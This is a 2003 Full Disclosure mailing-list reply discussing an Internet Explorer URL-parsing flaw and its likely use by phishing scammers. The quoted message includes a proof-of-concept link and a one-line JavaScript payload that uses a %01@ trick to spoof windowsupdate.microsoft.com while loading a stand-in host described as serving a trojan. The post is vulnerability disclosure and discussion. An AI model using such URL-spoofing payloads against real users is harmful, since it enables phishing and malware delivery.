Full Disclosure mailing list archives
Re: RE: FWD: Internet Explorer URL parsing vulnerability
From: "Clint Bodungen" <clint () secureconsulting com>
Date: Tue, 9 Dec 2003 13:08:20 -0600
I don't really think it will make that much of a difference their profits considering anyone dumb enough to fall for those scams isn't going to know the difference between an IP address in the URL box and a "spoofed" domain. I had a client fall for an eBay scam and the end resulting domain in the URL box was damn near www.robbingyoublinddamngringo.com. I can see where a more effective scam would be, like you hinted at, the infamous microsoft security update emails. ----- Original Message ----- From: "S G Masood" <sgmasood () yahoo com> To: <full-disclosure () lists netsys com> Sent: Tuesday, December 09, 2003 12:22 PM Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
LOL. This is so simple and dangerous, it almost made me laugh and cry at the same time. Most of you will realise why...;D The Paypal, AOL, Visa, Mastercard, et al email scammers will have a harvest of gold this month with lots of zombies falling for this simple technique.# POC ########## http://www.zapthedingbat.com/security/ex01/vun1.htmDont be surprised if your latest download from http://www.microsoft.com turns out to be a trojan!
location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadan eviltrojanfromme.com);
-- S.G.Masood Hyderabad, India PS: One more thing - no scripting required to exploit this. __________________________________ Do you Yahoo!? Free Pop-Up Blocker - Get it now http://companion.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability S . f . Stover (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Jeremiah Cornelius (Dec 09)
- <Possible follow-ups>
- FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Nick FitzGerald (Dec 09)
- RE: RE: FWD: Internet Explorer URL parsing vulnerability Chris S (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Michal Zalewski (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Nick FitzGerald (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
(Thread continues...)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)